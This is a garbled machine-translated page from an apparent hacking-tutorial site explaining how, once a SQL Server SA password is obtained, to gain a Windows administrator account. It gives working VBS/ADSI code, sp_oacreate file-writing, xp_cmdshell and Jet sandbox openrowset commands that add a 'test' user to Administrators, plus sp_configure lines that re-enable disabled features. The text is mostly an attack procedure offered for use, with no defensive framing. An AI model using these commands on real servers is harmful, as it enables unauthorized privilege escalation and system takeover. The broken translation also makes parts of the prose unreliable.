Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
mssql SA jurisdiction newest use method
  Add date: 08/12/2008   Publishing date: 08/12/2008   Hits: 24
After obtaining the SA password, because often the server superintendent or” the predecessor” is limited net.exe and net1.exe the use, is unable to increase the manager account number. We knew that VBS has a winnt object in the active table of contents (ADSI) part, uses for to manage the local resources, uses it to be possible not to depend upon orders and so on CMD to be able to increase a manager, the specific code is as follows: The following is quotes the fragment: set wsnetwork=CreateObject (“WS C R I P T.NETWORK”) os= " WinNT://“&wsnetwork.ComputerName Set ob=GetObject(os) 'obtains the adsi connection, binds Set oe=GetObject (os&” /Administrators, group”) 'the attribute, admin group Set od=ob. Create (“user”, “test”) 'establishment user od.SetPassword “1234” 'establishment password od.SetInfo 'preserves Set of=GetObject (os&” /test”, user) 'obtains user oe.add os&” /test” the above code preservation is 1.vbs, then the execution, the order is “cscript 1.vbs”, like this will increase system named test in the system, the password will be 1234 users. Makes concrete is as follows in the inquiry analyzer execution code: The following is quotes the fragment: declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs ', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'set wsnetwork=CreateObject (“WS C R I P T.NETWORK”) 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'os= " WinNT://“&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set ob=GetObject(os) 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set oe=GetObject (os&” /Administrators, group”) 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set od=ob. Create (“user”, “test”) 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetPassword “1234” 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetInfo 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set of=GetObject (os&” /test”, user) 'exec @ret = sp_oamethod @f, 'writeline', NULL, 'oe.add os&” /test” 'carries out the above sentence, carries out this line of codes under again, this line of codes carry out certainly alone, do not carry out with above putting in the same place, will otherwise prompt “c:\1.vbs to be unable by another program run” to increase successfully the user: exec master. .xp_cmdshell 'cscript c:\1.vbs', if the system user has not increased successfully, has the possibility is because of system user's password 1234 is too simple, does not conform to server's complex password strategy, may consider that the establishment complex, then test again. May also use echo to write the code in 1.vbs, the code format is: exec master. .xp_cmdshell 'echo set wsnetwork=CreateObject (“WS C R I P T.NETWORK”) >>1.vbs', but, did not know why all belts “&” the character order itinerant is unable to read in 1.vbs, is interested the friend may attempt solves. Uses the jet sand table pattern, may solve the worry which memory processes and the related dynamic link library tape and so on XP_cmdshell come. Stemming from the security reason, in the system default situation the sand table pattern has not opened, this needs the xp_regwrite opening sand table pattern: Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE \ Microsoft \ Jet \ 4.0 \ Engines', 'SandBoxMode', 'REG_DWORD', 1 then execution sand table order, increases user named test in the system, the password is 1234 users: select * from openrowset ('microsoft.jet.oledb.4.0','; database= c:\windows \system32\ias\ias.mdb', 'select shell (“cmd.exe /c net user test 1234 /add”)') select * from openrowset ('microsoft.jet.oledb.4.0','; the database= c:\windows \system32\ias\ias.mdb', 'select shell (“cmd.exe /c net localgroup administrators the test /add”)') the different operating system, the way is dissimilar, needs to make the revision according to the situation: NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\ other Microsoft SQL Server2005 in tacitly approves in the situation, some memory process is closing, needs to order to open: Opens XP_cmdshell: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Opening ' OPENROWSET': exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE; Opening ' sp_oacreate': exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
Prev:Nine kinds explain XP to register the password method Next:Ten kinds may instantaneous ruin the entire Internet attack method analysis

Comment:

Category: Home > hacker course
Home